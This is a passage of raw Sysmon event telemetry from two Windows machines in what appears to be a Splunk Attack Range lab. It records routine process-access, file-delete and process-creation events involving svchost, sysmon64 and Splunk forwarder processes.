10341000x8000000000000000152099Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:10.598{39BD8DE3-0F64-60CA-0D00-00000000D101}788808C:\Windows\system32\svchost.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000152098Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:10.598{39BD8DE3-0F64-60CA-0D00-00000000D101}788808C:\Windows\system32\svchost.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000152097Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:10.598{39BD8DE3-0F64-60CA-0D00-00000000D101}788808C:\Windows\system32\svchost.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000152096Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:10.598{39BD8DE3-0F64-60CA-0D00-00000000D101}788808C:\Windows\system32\svchost.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000152095Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:10.598{39BD8DE3-0F64-60CA-0D00-00000000D101}788808C:\Windows\system32\svchost.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000152094Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:10.598{39BD8DE3-0F64-60CA-0D00-00000000D101}788808C:\Windows\system32\svchost.exe{39BD8DE3-0FDB-60CA-8D00-00000000D101}648C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000152093Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:10.598{39BD8DE3-0F64-60CA-0D00-00000000D101}788808C:\Windows\system32\svchost.exe{39BD8DE3-0FDB-60CA-8D00-00000000D101}648C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000152092Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:10.598{39BD8DE3-0F64-60CA-0D00-00000000D101}788808C:\Windows\system32\svchost.exe{39BD8DE3-0FDB-60CA-8D00-00000000D101}648C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000152091Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:10.598{39BD8DE3-0F64-60CA-0D00-00000000D101}788808C:\Windows\system32\svchost.exe{39BD8DE3-0FDB-60CA-8D00-00000000D101}648C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000152090Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:10.598{39BD8DE3-0F64-60CA-0D00-00000000D101}788808C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1F00-00000000D101}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000152089Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:10.598{39BD8DE3-0F64-60CA-0D00-00000000D101}788808C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1F00-00000000D101}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000152088Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:10.099{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FDB143852F7F463CA106DAEE67B6FBC4,SHA256=61CE62C2A488F575EB9F6CCA06608FB696FAC520FD72B2BA410ED8BCF9E22A07,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105280Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:48:11.533{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3178A09E676775B9A271CFF2C83D3F7D,SHA256=6350ECAA98EB29F0B8F03B47568A4A51E8CAFB20BE19A234311BE02CA06191B1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000152146Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:11.247{39BD8DE3-480E-60CA-FA07-00000000D101}71324084C:\Windows\system32\conhost.exe{39BD8DE3-719B-60CA-320D-00000000D101}5924C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000152145Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:11.231{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000152144Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:11.231{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000152143Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:11.231{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000152142Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:11.231{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000152141Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:11.231{39BD8DE3-0F63-60CA-0500-00000000D101}408524C:\Windows\system32\csrss.exe{39BD8DE3-719B-60CA-320D-00000000D101}5924C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000152140Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:11.231{39BD8DE3-480D-60CA-F607-00000000D101}51125172C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{39BD8DE3-719B-60CA-320D-00000000D101}5924C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000152139Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:11.235{39BD8DE3-719B-60CA-320D-00000000D101}5924C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{39BD8DE3-0F64-60CA-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{39BD8DE3-480D-60CA-F607-00000000D101}5112C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000152138Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:11.231{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DE54A23819389F11E99F5D7FC2BFA518,SHA256=3237F29289771E27C412CD3B9E8AE80592897EA1C6191D92A083F04478AB164E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000105290Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:48:12.900{54715871-FD29-60C9-3700-00000000CF01}33683396C:\Windows\system32\conhost.exe{54715871-719C-60CA-3D13-00000000CF01}892C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105289Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:48:12.897{54715871-FD18-60C9-0C00-00000000CF01}8485316C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105288Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:48:12.897{54715871-FD18-60C9-0C00-00000000CF01}8485316C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105287Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:48:12.897{54715871-FD18-60C9-0C00-00000000CF01}8485316C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105286Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:48:12.897{54715871-FD18-60C9-0C00-00000000CF01}8485316C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105285Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:48:12.897{54715871-FD16-60C9-0500-00000000CF01}408368C:\Windows\system32\csrss.exe{54715871-719C-60CA-3D13-00000000CF01}892C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000105284Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:48:12.896{54715871-FD28-60C9-3000-00000000CF01}24483280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{54715871-719C-60CA-3D13-00000000CF01}892C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000105283Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:48:12.896{54715871-719C-60CA-3D13-00000000CF01}892C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{54715871-FD16-60C9-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{54715871-FD28-60C9-3000-00000000CF01}2448C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000105282Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:48:12.895{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8F5887E34880428DCCF75B3E0B99AEF6,SHA256=85D31D42639ACD94CAE7290F6209E3250EFD1B067EDBDB4A47366EC59FC1841B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000105281Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 